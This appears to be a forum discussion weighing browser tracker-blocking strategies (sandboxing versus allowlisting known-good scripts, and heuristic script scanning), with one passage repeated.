This is literally the same game virus scanners played against mutation engines. Ultimately, the halting problem won.
There are two places this can end:
* Redesign the runtime environment so it doesn’t matter if you download trackers. The execution environment doesn’t offer the I/O facilities that it requires to actually produce harm. This is what Apple Private Relay and Tor Browser try to give you. By analogy, this is why Web Apps became so popular in the first place — web publishers who do not intentionally collude are protected from each other by the SOP, so opening a web page should be less risky than running an EXE. It’s “just”[1] extending the existing sandbox to prevent differing origins from being able to collude.
* Instead of blocking bad scripts, allow only known-good ones. To match the convenience of current-day ad blocking, it needs to be a collaboratively-produced list. In other words, a gatekeeper. By analogy, this is why installing “unrecognized” applications on Windows and macOS is behind a scare screen, and why doing it on iOS is prevented entirely.
The former seems less dystopian, but much more difficult.
I was going to suggest introducing the kind of heuristic analysis found in antivirus engines. Kind of like your item #2 - don’t run scripts that behave badly (for some heuristically recognizable “bad behavior”.) Basically a browser built-in AV scanner. Maybe give a user the option to permit the script once per session, or forever. Something like this would definitely introduce a UX speed bump, it sounds terrible.
There are two places this can end:
* Redesign the runtime environment so it doesn’t matter if you download trackers. The execution environment doesn’t offer the I/O facilities that it requires to actually produce harm. This is what Apple Private Relay and Tor Browser try to give you. By analogy, this is why Web Apps became so popular in the first place — web publishers who do not intentionally collude are protected from each other by the SOP, so opening a web page should be less risky than running an EXE. It’s “just”[1] extending the existing sandbox to prevent differing origins from being able to collude.
* Instead of blocking bad scripts, allow only known-good ones. To match the convenience of current-day ad blocking, it needs to be a collaboratively-produced list. In other words, a gatekeeper. By analogy, this is why installing “unrecognized” applications on Windows and macOS is behind a scare screen, and why doing it on iOS is prevented entirely.
The former seems less dystopian, but much more difficult.
[1]: this is actually very difficult